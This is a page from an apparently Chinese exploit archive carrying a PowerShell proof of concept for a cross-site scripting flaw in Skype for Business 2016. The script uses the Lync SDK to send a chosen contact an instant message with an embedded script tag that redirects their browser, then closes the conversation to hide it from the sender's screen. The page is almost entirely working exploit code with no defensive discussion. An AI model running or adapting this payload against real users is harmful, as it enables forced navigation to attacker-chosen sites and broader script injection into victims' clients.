当前位置:首页 > POC 2017年07月23日
Skype for Business 2016 - 跨站点脚本漏洞

#target user
$target = "username@domain.com"
  
# For this example we will force the user to navigate to a page of our choosing (autopwn?)
# Skype uses the default browser for this.
  
$message = "PoC Skype for Business 2016 XSS Injection<script>document.location.href=('http://www.youtube.com/watch?v=9Rnr70wCQSA')</script>"
  
  
  
  
if (-not (Get-Module -Name Microsoft.Lync.Model))
{
    try
        {
        # you may need to change the location of this DLL
            Import-Module "C:\Program Files\Microsoft Office\Office15\LyncSDK\Assemblies\Desktop\Microsoft.Lync.Model.dll" -ErrorAction Stop
        }
    catch
        {
            Write-Warning "Microsoft.Lync.Model not available, download and install the Lync 2013 SDK http://www.microsoft.com/en-us/download/details.aspx?id=36824"
        }
}
  
 # Connect to the local Skype process
    try
    {
        $client = [Microsoft.Lync.Model.LyncClient]::GetClient()
    }
    catch
    {
        Write-Host "`nMust be signed-in to Skype"
        break
    }
  
     #Start Conversation
    $msg = New-Object "System.Collections.Generic.Dictionary[Microsoft.Lync.Model.Conversation.InstantMessageContentType, String]"
  
    #Add the Message
    $msg.Add(1,$message)
  
    # Add the contact URI
    try
    {
        $contact = $client.ContactManager.GetContactByUri($target)
    }
    catch
    {
        Write-Host "`nFailed to lookup Contact"$target
        break
    }
  
  
    # Create a conversation
    $convo = $client.ConversationManager.AddConversation()
    $convo.AddParticipant($contact) | Out-Null
  
    # Set the message mode as IM
    $imModality = $convo.Modalities[1]
    # Send the message
    $imModality.BeginSendMessage($msg, $null, $imModality) | Out-Null
    # End the Convo to suppress the UI
    $convo.End() | Out-Null
  
    Write-Host "Sent the following message to "$target":`n"$message



发表评论: